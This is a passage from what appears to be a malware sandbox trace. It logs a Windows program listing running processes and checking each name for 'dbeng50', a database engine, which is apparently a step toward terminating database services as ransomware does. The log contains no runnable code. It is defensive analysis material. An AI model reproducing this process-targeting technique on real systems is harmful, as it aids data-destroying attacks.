uBytes=0xc) returned 0x3576748 [0096.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x3576748, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0096.057] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0096.057] StrStrIA (lpFirst="omnipos.exe", lpSrch="dbeng50") returned 0x0 [0096.057] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0096.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0096.058] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3576778 [0096.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x3576778, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0096.059] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0096.059] StrStrIA (lpFirst="spcwin.exe", lpSrch="dbeng50") returned 0x0 [0096.059] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0096.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0096.062] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x3575e80 [0096.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x3575e80, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0096.062] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0096.062] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="dbeng50") returned 0x0 [0096.062] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0096.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0096.063] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x35766b8 [0096.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x35766b8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0096.063] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0096.064] StrStrIA (lpFirst="utg2.exe", lpSrch="dbeng50") returned 0x0 [0096.064] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0096.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0096.065] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35766e8 [0096.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x35766e8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0096.065] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0096.065] StrStrIA (lpFirst="saying.exe", lpSrch="dbeng50") returned 0x0 [0096.065] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0096.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0096.067] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x35767c0 [0096.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x35767c0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0096.067] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0096.067] StrStrIA (lpFirst="ripe.exe", lpSrch="dbeng50") returned 0x0 [0096.067] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0096.068] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.068] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3576850 [0096.068] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x3576850, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0096.068] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0096.068] StrStrIA (lpFirst="acoustic.exe", lpSrch="dbeng50") returned 0x0 [0096.069] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0096.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0096.070] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3576868 [0096.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x3576868, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0096.070] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0096.070] StrStrIA (lpFirst="mail.exe", lpSrch="dbeng50") returned 0x0 [0096.070] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0096.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.071] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3576820 [0096.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3576820, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0096.071] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0096.071] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="dbeng50") returned 0x0 [0096.071] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.072] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35767d8 [0096.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35767d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.072] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.072] StrStrIA (lpFirst="svchost.exe", lpSrch="dbeng50") returned 0x0 [0096.072] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0096.073] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.073] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35766d0 [0096.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x35766d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.074] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0096.074] StrStrIA (lpFirst="dllhost.exe", lpSrch="dbeng50") returned 0x0 [0096.074] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0096.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0096.075] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3576700 [0096.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3576700, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0096.075] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0096.075] StrStrIA (lpFirst="taskhostw.exe", lpSrch="dbeng50") returned 0x0 [0096.075] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0096.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0096.076] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35768e0 [0096.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x35768e0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0096.076] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0096.076] StrStrIA (lpFirst="UsoClient.exe", lpSrch="dbeng50") returned 0x0 [0096.076] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0096.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0096.077] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35768f8 [0096.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x35768f8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0096.077] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0096.077] StrStrIA (lpFirst="taskhostw.exe", lpSrch="dbeng50") returned 0x0 [0096.078] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0096.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0096.079] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x3575f60 [0096.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x3575f60, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0096.079] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0096.079] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="dbeng50") returned 0x0 [0096.079] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0096.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0096.080] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3575de0 [0096.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x3575de0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0096.080] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0096.080] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="dbeng50") returned 0x0 [0096.080] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0096.081] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0096.081] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356b0f0 [0096.081] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x356b0f0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppHostRegistrationVerifier.exe", lpUsedDefaultChar=0x0) returned 32 [0096.081] lstrcpyA (in: lpString1=0x567fabc, lpString2="AppHostRegistrationVerifier.exe" | out: lpString1="AppHostRegistrationVerifier.exe") returned="AppHostRegistrationVerifier.exe" [0096.081] StrStrIA (lpFirst="AppHostRegistrationVerifier.exe", lpSrch="dbeng50") returned 0x0 [0096.081] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0096.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.082] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3576910 [0096.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3576910, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.082] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0096.082] StrStrIA (lpFirst="conhost.exe", lpSrch="dbeng50") returned 0x0 [0096.082] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0096.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.083] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3576928 [0096.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3576928, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.084] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0096.084] StrStrIA (lpFirst="conhost.exe", lpSrch="dbeng50") returned 0x0 [0096.084] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0096.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0096.085] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3576718 [0096.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x3576718, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0096.085] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0096.085] StrStrIA (lpFirst="rxodge.exe", lpSrch="dbeng50") returned 0x0 [0096.085] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0096.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0096.086] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3576bf8 [0096.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x3576bf8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0096.086] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0096.086] StrStrIA (lpFirst="sppsvc.exe", lpSrch="dbeng50") returned 0x0 [0096.086] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0096.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0096.087] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3575fc0 [0096.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x3575fc0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TrustedInstaller.exe", lpUsedDefaultChar=0x0) returned 21 [0096.087] lstrcpyA (in: lpString1=0x567fabc, lpString2="TrustedInstaller.exe" | out: lpString1="TrustedInstaller.exe") returned="TrustedInstaller.exe" [0096.087] StrStrIA (lpFirst="TrustedInstaller.exe", lpSrch="dbeng50") returned 0x0 [0096.087] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 0 [0096.088] CloseHandle (hObject=0x350) returned 1 [0096.088] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x358 [0096.121] Process32FirstW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0096.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0096.122] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3575ec0 [0096.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x3575ec0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0096.122] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0096.122] StrStrIA 